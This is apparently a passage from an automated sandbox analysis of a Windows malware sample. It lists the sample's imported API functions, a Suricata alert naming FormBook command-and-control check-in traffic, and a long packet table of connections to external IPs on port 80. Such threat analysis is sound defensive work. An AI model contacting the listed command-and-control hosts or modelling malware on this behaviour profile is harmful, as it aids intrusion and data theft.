MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T02:50:31.483812+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.8	49711	134.0.14.158	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:50:12.288573027 CET	49708	80	192.168.2.8	172.67.186.192
Jan 11, 2025 02:50:12.293519974 CET	80	49708	172.67.186.192	192.168.2.8
Jan 11, 2025 02:50:12.293637991 CET	49708	80	192.168.2.8	172.67.186.192
Jan 11, 2025 02:50:12.302800894 CET	49708	80	192.168.2.8	172.67.186.192
Jan 11, 2025 02:50:12.307624102 CET	80	49708	172.67.186.192	192.168.2.8
Jan 11, 2025 02:50:12.987030029 CET	80	49708	172.67.186.192	192.168.2.8
Jan 11, 2025 02:50:12.987055063 CET	80	49708	172.67.186.192	192.168.2.8
Jan 11, 2025 02:50:12.987227917 CET	49708	80	192.168.2.8	172.67.186.192
Jan 11, 2025 02:50:12.988454103 CET	80	49708	172.67.186.192	192.168.2.8
Jan 11, 2025 02:50:12.988504887 CET	49708	80	192.168.2.8	172.67.186.192
Jan 11, 2025 02:50:12.990286112 CET	49708	80	192.168.2.8	172.67.186.192
Jan 11, 2025 02:50:12.995055914 CET	80	49708	172.67.186.192	192.168.2.8
Jan 11, 2025 02:50:28.063771009 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:28.068578005 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.068648100 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:28.092587948 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:28.098732948 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953398943 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953483105 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953520060 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953568935 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953604937 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953638077 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953661919 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:28.953663111 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:28.953675032 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953713894 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953715086 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:28.953756094 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953767061 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:28.953773022 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.953830957 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:28.958653927 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.958690882 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.958728075 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.958762884 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:28.958770037 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:28.958816051 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.057652950 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.057738066 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.057799101 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.057833910 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.057838917 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.057872057 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.057921886 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.057921886 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.057957888 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.057971001 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.057996988 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.058052063 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.058461905 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.058518887 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.058553934 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.058573961 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.058828115 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.058881998 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.058914900 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.058950901 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.058985949 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.059005976 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.059452057 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.059504032 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.059504986 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.059542894 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.059577942 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.059592009 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.059612989 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.059649944 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.059664011 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.060391903 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.060426950 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.060448885 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.060470104 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.060512066 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.062947989 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.108026028 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.151806116 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.161710978 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.161742926 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.161755085 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.161767960 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.161782026 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.161803961 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.161950111 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.161950111 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.162142038 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.162189007 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.162201881 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.162214041 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.162240982 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.162254095 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.162584066 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.162636042 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.162648916 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.162689924 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.162689924 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.162719965 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.162734985 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.163144112 CET	80	49710	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:29.163198948 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:29.608150959 CET	49710	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:30.628632069 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:30.633802891 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:30.633908987 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:30.661734104 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:30.666589975 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483747959 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483762980 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483774900 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483812094 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.483880043 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483897924 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483910084 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483916044 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483918905 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.483952999 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.483977079 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483988047 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.483999968 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.484015942 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.484035015 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.488643885 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.488682985 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.488713980 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.587881088 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.587963104 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.587975025 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.588047981 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.588057041 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.588098049 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.588119984 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.588133097 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.588154078 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.588165998 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.588172913 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.588206053 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.588958979 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.588973999 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.588987112 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.588999033 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.589020014 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.589052916 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.589520931 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.589533091 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.589545012 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.589561939 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.589562893 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.589575052 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.589592934 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.590364933 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.590377092 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.590389013 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.590414047 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.590421915 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.590436935 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.590445995 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.590486050 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.592875957 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.592889071 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.592926979 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.676532030 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.676558018 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.676626921 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.692250967 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692333937 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692346096 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692358971 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692397118 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.692416906 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692421913 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.692430019 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692441940 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692451000 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692466021 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.692493916 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.692610979 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692621946 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692631960 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692667961 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.692734957 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692770958 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692776918 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.692781925 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692807913 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.692821980 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:31.692986012 CET	80	49711	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:31.693031073 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:32.170736074 CET	49711	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:33.189296961 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:33.194792986 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:33.194909096 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:33.209640026 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:33.214890957 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:33.215034008 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054550886 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054574966 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054585934 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054667950 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054681063 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054701090 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054713964 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054779053 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.054788113 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054802895 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054814100 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.054832935 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.054904938 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.059672117 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.059685946 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.059696913 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.059726000 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.108311892 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.158961058 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.158987045 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159001112 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159013033 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159025908 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159066916 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.159137011 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159234047 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159245014 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159276009 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.159300089 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.159599066 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159642935 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159653902 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159682035 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.159702063 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159715891 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.159739017 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.160600901 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.160613060 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.160628080 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.160648108 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.160662889 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.160737038 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.160749912 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.160797119 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.161513090 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.161556959 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.161569118 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.161596060 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.161631107 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.161643982 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.161673069 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.184900999 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.184916973 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.185111046 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.248200893 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.248219967 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.248274088 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.267769098 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268121958 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268167973 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.268392086 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268646002 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268696070 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.268809080 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268826962 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268837929 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268850088 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268860102 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268868923 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.268872023 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268883944 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268886089 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.268897057 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268908978 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268919945 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268929958 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268934965 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.268942118 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268959045 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.268973112 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268982887 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.268985033 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.268996000 CET	80	49712	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:34.269021034 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.269052029 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:34.717478037 CET	49712	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:35.736665964 CET	49713	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:35.741571903 CET	80	49713	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:35.741666079 CET	49713	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:35.750598907 CET	49713	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:35.755379915 CET	80	49713	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:36.585488081 CET	80	49713	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:36.585681915 CET	80	49713	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:36.585786104 CET	49713	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:36.587927103 CET	49713	80	192.168.2.8	134.0.14.158
Jan 11, 2025 02:50:36.592726946 CET	80	49713	134.0.14.158	192.168.2.8
Jan 11, 2025 02:50:41.904617071 CET	49714	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:41.909693003 CET	80	49714	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:41.910136938 CET	49714	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:41.930479050 CET	49714	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:41.935364962 CET	80	49714	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:42.527854919 CET	80	49714	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:42.527910948 CET	80	49714	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:42.527996063 CET	49714	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:43.436377048 CET	49714	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:44.454557896 CET	49715	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:44.459894896 CET	80	49715	103.224.182.242	192.168.2.8
